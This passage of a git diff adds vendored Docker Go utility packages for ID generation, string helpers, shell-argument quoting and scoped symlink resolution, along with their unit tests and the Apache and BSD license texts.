+	res := sf.FormatStream("stream")
+	if string(res) != `{"stream":"stream"}`+"\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestJSONFormatStatus(t *testing.T) {
+	sf := NewJSONStreamFormatter()
+	res := sf.FormatStatus("ID", "%s%d", "a", 1)
+	if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestJSONFormatSimpleError(t *testing.T) {
+	sf := NewJSONStreamFormatter()
+	res := sf.FormatError(errors.New("Error for formatter"))
+	if string(res) != `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}`+"\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestJSONFormatJSONError(t *testing.T) {
+	sf := NewJSONStreamFormatter()
+	err := &jsonmessage.JSONError{Code: 50, Message: "Json error"}
+	res := sf.FormatError(err)
+	if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" {
+		t.Fatalf("%q", res)
+	}
+}
+
+func TestJSONFormatProgress(t *testing.T) {
+	sf := NewJSONStreamFormatter()
+	progress := &jsonmessage.JSONProgress{
+		Current: 15,
+		Total:   30,
+		Start:   1,
+	}
+	res := sf.FormatProgress("id", "action", progress, nil)
+	msg := &jsonmessage.JSONMessage{}
+	if err := json.Unmarshal(res, msg); err != nil {
+		t.Fatal(err)
+	}
+	if msg.ID != "id" {
+		t.Fatalf("ID must be 'id', got: %s", msg.ID)
+	}
+	if msg.Status != "action" {
+		t.Fatalf("Status must be 'action', got: %s", msg.Status)
+	}
+
+	// The progress will always be in the format of:
+	// [=========================>                         ]     15 B/30 B 404933h7m11s
+	// The last entry '404933h7m11s' is the timeLeftBox.
+	// However, the timeLeftBox field may change as progress.String() depends on time.Now().
+	// Therefore, we have to strip the timeLeftBox from the strings to do the comparison.
+
+	// Compare the progress strings before the timeLeftBox
+	expectedProgress := "[=========================>                         ]     15 B/30 B"
+	// if terminal column is <= 110, expectedProgressShort is expected.
+	expectedProgressShort := "    15 B/30 B"
+	if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) ||
+		strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) {
+		t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s",
+			expectedProgress, expectedProgressShort, msg.ProgressMessage)
+	}
+
+	if !reflect.DeepEqual(msg.Progress, progress) {
+		t.Fatal("Original progress not equals progress from FormatProgress")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/stringid/README.md b/vendor/github.com/docker/docker/pkg/stringid/README.md
new file mode 100644
index 0000000000..37a5098fd9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringid/README.md
@@ -0,0 +1 @@
+This package provides helper functions for dealing with string identifiers
diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go
new file mode 100644
index 0000000000..fa35d8bad5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go
@@ -0,0 +1,69 @@
+// Package stringid provides helper functions for dealing with string identifiers
+package stringid
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"io"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/random"
+)
+
+const shortLen = 12
+
+var validShortID = regexp.MustCompile("^[a-z0-9]{12}$")
+
+// IsShortID determines if an arbitrary string *looks like* a short ID.
+func IsShortID(id string) bool {
+	return validShortID.MatchString(id)
+}
+
+// TruncateID returns a shorthand version of a string identifier for convenience.
+// A collision with other shorthands is very unlikely, but possible.
+// In case of a collision a lookup with TruncIndex.Get() will fail, and the caller
+// will need to use a longer prefix, or the full-length Id.
+func TruncateID(id string) string {
+	if i := strings.IndexRune(id, ':'); i >= 0 {
+		id = id[i+1:]
+	}
+	if len(id) > shortLen {
+		id = id[:shortLen]
+	}
+	return id
+}
+
+func generateID(crypto bool) string {
+	b := make([]byte, 32)
+	r := random.Reader
+	if crypto {
+		r = rand.Reader
+	}
+	for {
+		if _, err := io.ReadFull(r, b); err != nil {
+			panic(err) // This shouldn't happen
+		}
+		id := hex.EncodeToString(b)
+		// if we try to parse the truncated for as an int and we don't have
+		// an error then the value is all numeric and causes issues when
+		// used as a hostname. ref #3869
+		if _, err := strconv.ParseInt(TruncateID(id), 10, 64); err == nil {
+			continue
+		}
+		return id
+	}
+}
+
+// GenerateRandomID returns a unique id.
+func GenerateRandomID() string {
+	return generateID(true)
+}
+
+// GenerateNonCryptoID generates unique id without using cryptographically
+// secure sources of random.
+// It helps you to save entropy.
+func GenerateNonCryptoID() string {
+	return generateID(false)
+}
diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
new file mode 100644
index 0000000000..8ff6b4383d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go
@@ -0,0 +1,72 @@
+package stringid
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestGenerateRandomID(t *testing.T) {
+	id := GenerateRandomID()
+
+	if len(id) != 64 {
+		t.Fatalf("Id returned is incorrect: %s", id)
+	}
+}
+
+func TestGenerateNonCryptoID(t *testing.T) {
+	id := GenerateNonCryptoID()
+
+	if len(id) != 64 {
+		t.Fatalf("Id returned is incorrect: %s", id)
+	}
+}
+
+func TestShortenId(t *testing.T) {
+	id := "90435eec5c4e124e741ef731e118be2fc799a68aba0466ec17717f24ce2ae6a2"
+	truncID := TruncateID(id)
+	if truncID != "90435eec5c4e" {
+		t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID)
+	}
+}
+
+func TestShortenSha256Id(t *testing.T) {
+	id := "sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba"
+	truncID := TruncateID(id)
+	if truncID != "4e38e38c8ce0" {
+		t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID)
+	}
+}
+
+func TestShortenIdEmpty(t *testing.T) {
+	id := ""
+	truncID := TruncateID(id)
+	if len(truncID) > len(id) {
+		t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID)
+	}
+}
+
+func TestShortenIdInvalid(t *testing.T) {
+	id := "1234"
+	truncID := TruncateID(id)
+	if len(truncID) != len(id) {
+		t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID)
+	}
+}
+
+func TestIsShortIDNonHex(t *testing.T) {
+	id := "some non-hex value"
+	if IsShortID(id) {
+		t.Fatalf("%s is not a short ID", id)
+	}
+}
+
+func TestIsShortIDNotCorrectSize(t *testing.T) {
+	id := strings.Repeat("a", shortLen+1)
+	if IsShortID(id) {
+		t.Fatalf("%s is not a short ID", id)
+	}
+	id = strings.Repeat("a", shortLen-1)
+	if IsShortID(id) {
+		t.Fatalf("%s is not a short ID", id)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md
new file mode 100644
index 0000000000..b3e454573c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringutils/README.md
@@ -0,0 +1 @@
+This package provides helper functions for dealing with strings
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
new file mode 100644
index 0000000000..8e1c812d7a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
@@ -0,0 +1,101 @@
+// Package stringutils provides helper functions for dealing with strings.
+package stringutils
+
+import (
+	"bytes"
+	"math/rand"
+	"strings"
+
+	"github.com/docker/docker/pkg/random"
+)
+
+// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n.
+func GenerateRandomAlphaOnlyString(n int) string {
+	// make a really long string
+	letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
+	b := make([]byte, n)
+	for i := range b {
+		b[i] = letters[random.Rand.Intn(len(letters))]
+	}
+	return string(b)
+}
+
+// GenerateRandomASCIIString generates an ASCII random string with length n.
+func GenerateRandomASCIIString(n int) string {
+	chars := "abcdefghijklmnopqrstuvwxyz" +
+		"ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
+		"~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` "
+	res := make([]byte, n)
+	for i := 0; i < n; i++ {
+		res[i] = chars[rand.Intn(len(chars))]
+	}
+	return string(res)
+}
+
+// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...).
+// For maxlen of 3 and lower, no ellipsis is appended.
+func Ellipsis(s string, maxlen int) string {
+	r := []rune(s)
+	if len(r) <= maxlen {
+		return s
+	}
+	if maxlen <= 3 {
+		return string(r[:maxlen])
+	}
+	return string(r[:maxlen-3]) + "..."
+}
+
+// Truncate truncates a string to maxlen.
+func Truncate(s string, maxlen int) string {
+	r := []rune(s)
+	if len(r) <= maxlen {
+		return s
+	}
+	return string(r[:maxlen])
+}
+
+// InSlice tests whether a string is contained in a slice of strings or not.
+// Comparison is case insensitive
+func InSlice(slice []string, s string) bool {
+	for _, ss := range slice {
+		if strings.ToLower(s) == strings.ToLower(ss) {
+			return true
+		}
+	}
+	return false
+}
+
+func quote(word string, buf *bytes.Buffer) {
+	// Bail out early for "simple" strings
+	if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! \t\n") {
+		buf.WriteString(word)
+		return
+	}
+
+	buf.WriteString("'")
+
+	for i := 0; i < len(word); i++ {
+		b := word[i]
+		if b == '\'' {
+			// Replace literal ' with a close ', a \', and a open '
+			buf.WriteString("'\\''")
+		} else {
+			buf.WriteByte(b)
+		}
+	}
+
+	buf.WriteString("'")
+}
+
+// ShellQuoteArguments takes a list of strings and escapes them so they will be
+// handled right when passed as arguments to a program via a shell
+func ShellQuoteArguments(args []string) string {
+	var buf bytes.Buffer
+	for i, arg := range args {
+		if i != 0 {
+			buf.WriteByte(' ')
+		}
+		quote(arg, &buf)
+	}
+	return buf.String()
+}
diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
new file mode 100644
index 0000000000..8af2bdcc0b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
@@ -0,0 +1,121 @@
+package stringutils
+
+import "testing"
+
+func testLengthHelper(generator func(int) string, t *testing.T) {
+	expectedLength := 20
+	s := generator(expectedLength)
+	if len(s) != expectedLength {
+		t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength)
+	}
+}
+
+func testUniquenessHelper(generator func(int) string, t *testing.T) {
+	repeats := 25
+	set := make(map[string]struct{}, repeats)
+	for i := 0; i < repeats; i = i + 1 {
+		str := generator(64)
+		if len(str) != 64 {
+			t.Fatalf("Id returned is incorrect: %s", str)
+		}
+		if _, ok := set[str]; ok {
+			t.Fatalf("Random number is repeated")
+		}
+		set[str] = struct{}{}
+	}
+}
+
+func isASCII(s string) bool {
+	for _, c := range s {
+		if c > 127 {
+			return false
+		}
+	}
+	return true
+}
+
+func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) {
+	testLengthHelper(GenerateRandomAlphaOnlyString, t)
+}
+
+func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) {
+	testUniquenessHelper(GenerateRandomAlphaOnlyString, t)
+}
+
+func TestGenerateRandomAsciiStringLength(t *testing.T) {
+	testLengthHelper(GenerateRandomASCIIString, t)
+}
+
+func TestGenerateRandomAsciiStringUniqueness(t *testing.T) {
+	testUniquenessHelper(GenerateRandomASCIIString, t)
+}
+
+func TestGenerateRandomAsciiStringIsAscii(t *testing.T) {
+	str := GenerateRandomASCIIString(64)
+	if !isASCII(str) {
+		t.Fatalf("%s contained non-ascii characters", str)
+	}
+}
+
+func TestEllipsis(t *testing.T) {
+	str := "t🐳ststring"
+	newstr := Ellipsis(str, 3)
+	if newstr != "t🐳s" {
+		t.Fatalf("Expected t🐳s, got %s", newstr)
+	}
+	newstr = Ellipsis(str, 8)
+	if newstr != "t🐳sts..." {
+		t.Fatalf("Expected tests..., got %s", newstr)
+	}
+	newstr = Ellipsis(str, 20)
+	if newstr != "t🐳ststring" {
+		t.Fatalf("Expected t🐳ststring, got %s", newstr)
+	}
+}
+
+func TestTruncate(t *testing.T) {
+	str := "t🐳ststring"
+	newstr := Truncate(str, 4)
+	if newstr != "t🐳st" {
+		t.Fatalf("Expected t🐳st, got %s", newstr)
+	}
+	newstr = Truncate(str, 20)
+	if newstr != "t🐳ststring" {
+		t.Fatalf("Expected t🐳ststring, got %s", newstr)
+	}
+}
+
+func TestInSlice(t *testing.T) {
+	slice := []string{"t🐳st", "in", "slice"}
+
+	test := InSlice(slice, "t🐳st")
+	if !test {
+		t.Fatalf("Expected string t🐳st to be in slice")
+	}
+	test = InSlice(slice, "SLICE")
+	if !test {
+		t.Fatalf("Expected string SLICE to be in slice")
+	}
+	test = InSlice(slice, "notinslice")
+	if test {
+		t.Fatalf("Expected string notinslice not to be in slice")
+	}
+}
+
+func TestShellQuoteArgumentsEmpty(t *testing.T) {
+	actual := ShellQuoteArguments([]string{})
+	expected := ""
+	if actual != expected {
+		t.Fatalf("Expected an empty string")
+	}
+}
+
+func TestShellQuoteArguments(t *testing.T) {
+	simpleString := "simpleString"
+	complexString := "This is a 'more' complex $tring with some special char *"
+	actual := ShellQuoteArguments([]string{simpleString, complexString})
+	expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'"
+	if actual != expected {
+		t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
new file mode 100644
index 0000000000..34c4ea7c50
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE
@@ -0,0 +1,191 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   Copyright 2014-2016 Docker, Inc.
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
new file mode 100644
index 0000000000..9b4f4a294e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD
@@ -0,0 +1,27 @@
+Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+   * Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+   * Redistributions in binary form must reproduce the above
+copyright notice, this list of conditions and the following disclaimer
+in the documentation and/or other materials provided with the
+distribution.
+   * Neither the name of Google Inc. nor the names of its
+contributors may be used to endorse or promote products derived from
+this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/vendor/github.com/docker/docker/pkg/symlink/README.md b/vendor/github.com/docker/docker/pkg/symlink/README.md
new file mode 100644
index 0000000000..8dba54fd08
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/README.md
@@ -0,0 +1,6 @@
+Package symlink implements EvalSymlinksInScope which is an extension of filepath.EvalSymlinks,
+as well as a Windows long-path aware version of filepath.EvalSymlinks
+from the [Go standard library](https://golang.org/pkg/path/filepath).
+
+The code from filepath.EvalSymlinks has been adapted in fs.go.
+Please read the LICENSE.BSD file that governs fs.go and LICENSE.APACHE for fs_test.go.
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go
new file mode 100644
index 0000000000..f6bc2231f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go
@@ -0,0 +1,144 @@
+// Copyright 2012 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE.BSD file.
+
+// This code is a modified version of path/filepath/symlink.go from the Go standard library.
+
+package symlink
+
+import (
+	"bytes"
+	"errors"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an
+// absolute path. This function handles paths in a platform-agnostic manner.
+func FollowSymlinkInScope(path, root string) (string, error) {
+	path, err := filepath.Abs(filepath.FromSlash(path))
+	if err != nil {
+		return "", err
+	}
+	root, err = filepath.Abs(filepath.FromSlash(root))
+	if err != nil {
+		return "", err
+	}
+	return evalSymlinksInScope(path, root)
+}
+
+// evalSymlinksInScope will evaluate symlinks in `path` within a scope `root` and return
+// a result guaranteed to be contained within the scope `root`, at the time of the call.
+// Symlinks in `root` are not evaluated and left as-is.
+// Errors encountered while attempting to evaluate symlinks in path will be returned.
+// Non-existing paths are valid and do not constitute an error.
+// `path` has to contain `root` as a prefix, or else an error will be returned.
+// Trying to break out from `root` does not constitute an error.
+//
+// Example:
+//   If /foo/bar -> /outside,
+//   FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide"
+//
+// IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks
+// are created and not to create subsequently, additional symlinks that could potentially make a
+// previously-safe path, unsafe. Example: if /foo/bar does not exist, evalSymlinksInScope("/foo/bar", "/foo")
+// would return "/foo/bar". If one makes /foo/bar a symlink to /baz subsequently, then "/foo/bar" should
+// no longer be considered safely contained in "/foo".
+func evalSymlinksInScope(path, root string) (string, error) {
+	root = filepath.Clean(root)
+	if path == root {
+		return path, nil
+	}
+	if !strings.HasPrefix(path, root) {
+		return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root)
+	}
+	const maxIter = 255
+	originalPath := path
+	// given root of "/a" and path of "/a/b/../../c" we want path to be "/b/../../c"
+	path = path[len(root):]
+	if root == string(filepath.Separator) {
+		path = string(filepath.Separator) + path
+	}
+	if !strings.HasPrefix(path, string(filepath.Separator)) {
+		return "", errors.New("evalSymlinksInScope: " + path + " is not in " + root)
+	}
+	path = filepath.Clean(path)
+	// consume path by taking each frontmost path element,
+	// expanding it if it's a symlink, and appending it to b
+	var b bytes.Buffer
+	// b here will always be considered to be the "current absolute path inside
+	// root" when we append paths to it, we also append a slash and use
+	// filepath.Clean after the loop to trim the trailing slash
+	for n := 0; path != ""; n++ {
+		if n > maxIter {
+			return "", errors.New("evalSymlinksInScope: too many links in " + originalPath)
+		}
+
+		// find next path component, p
+		i := strings.IndexRune(path, filepath.Separator)
+		var p string
+		if i == -1 {
+			p, path = path, ""
+		} else {
+			p, path = path[:i], path[i+1:]
+		}
+
+		if p == "" {
+			continue
+		}
+
+		// this takes a b.String() like "b/../" and a p like "c" and turns it
+		// into "/b/../c" which then gets filepath.Cleaned into "/c" and then
+		// root gets prepended and we Clean again (to remove any trailing slash
+		// if the first Clean gave us just "/")
+		cleanP := filepath.Clean(string(filepath.Separator) + b.String() + p)
+		if isDriveOrRoot(cleanP) {
+			// never Lstat "/" itself, or drive letters on Windows
+			b.Reset()
+			continue
+		}
+		fullP := filepath.Clean(root + cleanP)
+
+		fi, err := os.Lstat(fullP)
+		if os.IsNotExist(err) {
+			// if p does not exist, accept it
+			b.WriteString(p)
+			b.WriteRune(filepath.Separator)
+			continue
+		}
+		if err != nil {
+			return "", err
+		}
+		if fi.Mode()&os.ModeSymlink == 0 {
+			b.WriteString(p)
+			b.WriteRune(filepath.Separator)
+			continue
+		}
+
+		// it's a symlink, put it at the front of path
+		dest, err := os.Readlink(fullP)
+		if err != nil {
+			return "", err
+		}
+		if system.IsAbs(dest) {
+			b.Reset()
+		}
+		path = dest + string(filepath.Separator) + path
+	}
+
+	// see note above on "fullP := ..." for why this is double-cleaned and
+	// what's happening here
+	return filepath.Clean(root + filepath.Clean(string(filepath.Separator)+b.String())), nil
+}
+
+// EvalSymlinks returns the path name after the evaluation of any symbolic
+// links.
+// If path is relative the result will be relative to the current directory,
+// unless one of the components is an absolute symbolic link.
+// This version has been updated to support long paths prepended with `\\?\`.
+func EvalSymlinks(path string) (string, error) {
+	return evalSymlinks(path)
+}
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
new file mode 100644
index 0000000000..22708273d6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go
@@ -0,0 +1,15 @@
+// +build !windows
+
+package symlink
+
+import (
+	"path/filepath"
+)
+
+func evalSymlinks(path string) (string, error) {
+	return filepath.EvalSymlinks(path)
+}
+
+func isDriveOrRoot(p string) bool {
+	return p == string(filepath.Separator)
+}
diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
new file mode 100644
index 0000000000..7085c0b666
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go
@@ -0,0 +1,407 @@
+// +build !windows
+
+// Licensed under the Apache License, Version 2.0; See LICENSE.APACHE
+
+package symlink
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+// TODO Windows: This needs some serious work to port to Windows. For now,
+// turning off testing in this package.
+
+type dirOrLink struct {
+	path   string
+	target string
+}
+
+func makeFs(tmpdir string, fs []dirOrLink) error {
+	for _, s := range fs {
+		s.path = filepath.Join(tmpdir, s.path)
+		if s.target == "" {
+			os.MkdirAll(s.path, 0755)
+			continue
+		}
+		if err := os.MkdirAll(filepath.Dir(s.path), 0755); err != nil {
+			return err
+		}
+		if err := os.Symlink(s.target, s.path); err != nil && !os.IsExist(err) {
+			return err
+		}
+	}
+	return nil
+}
+
+func testSymlink(tmpdir, path, expected, scope string) error {
